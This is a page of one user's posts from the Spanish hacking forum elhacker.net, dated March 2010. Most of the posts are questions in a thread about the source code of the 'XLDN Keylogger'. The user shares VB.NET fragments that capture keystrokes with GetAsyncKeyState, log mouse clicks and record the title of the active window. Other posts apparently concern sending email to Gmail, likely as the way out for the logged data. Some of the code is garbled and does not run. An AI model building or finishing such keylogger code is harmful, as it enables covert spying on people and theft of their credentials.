elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6
31  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 6 Marzo 2010, 14:53 pm
Ok, gracias por la ayuda me está sirviendo de mucho!
Sobre lo que preguntas la verdad no tengo ni idea!
32  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 4 Marzo 2010, 21:31 pm
Si alguien sabe como se puede compilar codigo desde codigo... me haria un gran favor =P
No entendí a que te refieres con eso?

Mira estoy intentando mejorar un poco la captura de teclas y estoy probando con esto
Código:
    Private Sub Form1_KeyDown(ByVal sender As System.Object, ByVal e As System.Windows.Forms.KeyEventArgs) Handles MyBase.KeyDown
        Select Case e.KeyValue
            Case Keys.A
                MsgBox("A")
            Case Keys.B
                MsgBox("B")
            Case Keys.A And Keys.Alt
                MsgBox("Alt+A")
        End Select
    End Sub
Pero el problema es para usarlo en el Timer1_tick ya que no se como se puede capturar la e de System.Windows.Forms.KeyEventArgs. Se te ocurre algo, es que en tu código me da error esta parte
Código:
If KeyCode > 64 And KeyCode < translatekey =" IIf(LngShift"> 0, Chr(KeyCode),_
 Chr(KeyCode + 32))
no sé si tal vez te equivocases al copiar o algo no sé!
33  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 3 Marzo 2010, 14:40 pm
Ok, ya funciona, muchas gracias!
Respecto a esta parte del código
Código:
      If KeyCode > 64 And KeyCode < translatekey =" IIf(LngShift"> 0, Chr(KeyCode),_
 Chr(KeyCode + 32))
      ElseIf KeyCode >= 58 And KeyCode <= 90 Then _
 TranslateKey = If(LngShift <> 0, Chr(KeyCode), UCase(Chr(KeyCode)))
      ElseIf KeyCode >= 96 And KeyCode <= 105 Then _
 TranslateKey = Chr(KeyCode - 48)         ElseIf KeyCode >= 112 And KeyCode <= 123 Then _
 TranslateKey = "{F" & KeyCode - 111 & "}"         Else
En especial a esto:
Código:
If KeyCode > 64 And KeyCode < translatekey =" IIf(LngShift"> 0, Chr(KeyCode),_
 Chr(KeyCode + 32))
No me funciona, no se veo eso un poco raro al asignarle a translatekey " IIf(Lng...."
Otra cosa, cuando haces por ejemplo IIf(LngShift <> 0, ";", ",") es para saber si tenemos pulsada la tecla Shift no? es que lo pruebo y me salen otras cosas, tal vez tenga que ver con la configuracion de teclado, pero que yo sepa tengo la española jeje! Si por ejemplo pulso "." me sale "3/4". Voy a mirar la configuración de teclado!
34  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 2 Marzo 2010, 22:54 pm
Ok, lo acabo de probar y si funciona, ahora lo que debo hacer es llamar a ese code cada vez que pulse una tecla/clic. Gracias! Mañana lo intento y te cuento!

Hola buenos días!
Ya lo he probado y me funciona perfectamente, pero como te decía con la declaración de ShiftKey, solo está en la línea LngShift = GetAsyncKeyState(ShiftKey) ¿Qué valor debe tener?
35  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 2 Marzo 2010, 17:39 pm
No me funciona ya que si lo pongo dentro, sigue entrando dentro del return y sale, y ahí ya no me captura la pulsación de teclas/ratón!

Otra cosa que tengo duda es, cuando pones esto LngShift = GetAsyncKeyState(ShiftKey) donde está declara la variable ShiftKey porque me aparece como que no está declarada!
36  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 2 Marzo 2010, 13:15 pm
Hola, otra duda que me surgió fue, para capturar la ventana activa donde se hace clic, tengo el siguiente código

Código:
    Private Shared Function GetForegroundWindow() As System.IntPtr
    End Function
    'Send string with the window name to the handle.

    Private Shared Function GetWindowText( _
       ByVal hWnd As System.IntPtr, _
       ByVal lpString As System.Text.StringBuilder, _
       ByVal cch As Integer) As Integer
    End Function
----------------------
Private Sub Ventana(ByVal hWnd As IntPtr, ByVal title As System.Text.StringBuilder, ByVal WindowName As String, ByVal ret As Integer)
        inUse = True
        If hWnd.Equals(IntPtr.Zero) Then Return
        ret = GetWindowText(hWnd, title, title.Length)
        If ret = 0 Then Return
        WindowName = title.ToString.Substring(0, ret)
        If WindowName <> Nothing AndAlso WindowName.Length > 0 Then
            If WindowName.Contains(openProgram) = False Then
                openProgram = WindowName
                MsgBox(WindowName)
            End If
        End If
    End Sub
----------------------
...
If result = -32767 Then 'if a known key is pressed
                Ventana(hWnd, title, WindowName, ret)
...

Falta alguna variable por declarar pero que en mí código si están. No se pero por ejemplo en If hWnd.Equals(IntPtr.Zero) Then Return dice que son iguales y sale cuando hago clic, no entiendo por qué, debo modificar algo?
37  Programación / .NET (C#, VB.NET, ASP) / Re: Enviar correo a Gmail! en: 1 Marzo 2010, 20:23 pm
Sí lo probaré, pero lo haré en otro pc en la misma conexión ya que en el mio se ralentiza con las máquinas virtuales jeje!
38  Programación / .NET (C#, VB.NET, ASP) / Re: XLDN Keylogger v1.1 Source code en: 1 Marzo 2010, 20:21 pm
Ok, gracias ya di un avance, al final la pulsaciones del raton son:

Código:
If cont = 1 Then Label4.Text = "{CLIC DERECHO}"
If cont = 2 Then Label4.Text = "{CLIC IZQUIERDO}"
If cont = 4 Then Label4.Text = "{CLIC CENTRO}"
39  Programación / .NET (C#, VB.NET, ASP) / Re: Enviar correo a Gmail! en: 1 Marzo 2010, 17:55 pm
Aún desconectando el firewall, el antivirus... no funciona!
40  Programación / .NET (C#, VB.NET, ASP) / Re: Enviar correo a Gmail! en: 1 Marzo 2010, 17:07 pm
El try catch ya está, me sale "Error al enviar correo." se puede mostrar algun otro tipo de error?
Páginas: 1 2 3 [4] 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines